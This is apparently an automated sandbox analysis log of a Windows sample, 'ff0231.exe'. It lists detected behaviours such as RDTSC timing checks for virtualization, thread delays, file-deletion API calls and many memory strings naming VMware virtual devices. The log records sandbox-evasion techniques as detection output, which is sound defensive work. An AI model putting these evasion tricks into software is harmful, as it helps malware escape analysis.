Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\ff0231.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ff0231.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000000D89904 second address: 0000000000D8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 0000000000D89B6E second address: 0000000000D89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 3_2_00409AA0 rdtsc

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 700
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 638

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\ff0231.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_00402630 FindFirstFileA,

Source: explorer.exe, 00000010.00000003.872436336.0000000006382000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Microsoft.Windows.ContenBh-
Source: explorer.exe, 00000010.00000003.877175490.000000000D238000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s
Source: explorer.exe, 00000010.00000003.878209203.000000000D611000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B4
Source: explorer.exe, 00000010.00000000.836821710.00000000062B2000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000010.00000000.879501670.0000000005E3D000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000003.872436336.0000000006382000.00000004.00000001.sdmp	Binary or memory string: 0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}LocalState
Source: explorer.exe, 00000010.00000003.881532732.000000000D246000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B*
Source: explorer.exe, 00000005.00000000.718086170.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000000.836697354.0000000006210000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\6
Source: explorer.exe, 00000010.00000003.879179015.000000000D245000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B0
Source: explorer.exe, 00000010.00000000.836821710.00000000062B2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000010.00000003.872185534.0000000006376000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1h2txyewyF
Source: explorer.exe, 00000005.00000000.711383115.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000010.00000003.880579348.000000000D246000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B'
Source: explorer.exe, 00000005.00000000.718270528.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.718270528.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000010.00000003.860008455.0000000006348000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
Source: explorer.exe, 00000010.00000003.866529774.0000000006348000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}S
Source: explorer.exe, 00000010.00000003.866529774.0000000006348000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: explorer.exe, 00000010.00000003.866529774.0000000006348000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}U
Source: explorer.exe, 00000010.00000003.866529774.0000000006348000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W
Source: explorer.exe, 00000010.00000000.876781324.0000000004B84000.00000004.00000001.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000010.00000000.880581056.000000000624C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000010.00000003.864798246.0000000006360000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BJ
Source: explorer.exe, 00000010.00000000.876781324.0000000004B84000.00000004.00000001.sdmp	Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000010.00000000.880924733.0000000006376000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}O
Source: explorer.exe, 00000010.00000003.866529774.0000000006348000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
Source: explorer.exe, 00000010.00000003.861766817.000000000635C000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BA
Source: explorer.exe, 00000010.00000003.878209203.000000000D611000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B;
Source: explorer.exe, 00000010.00000003.872185534.0000000006376000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Microsoft.WindowBK
Source: explorer.exe, 00000010.00000003.866529774.0000000006348000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000010.00000003.855183935.000000000635C000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bt
Source: explorer.exe, 00000010.00000000.880924733.0000000006376000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0
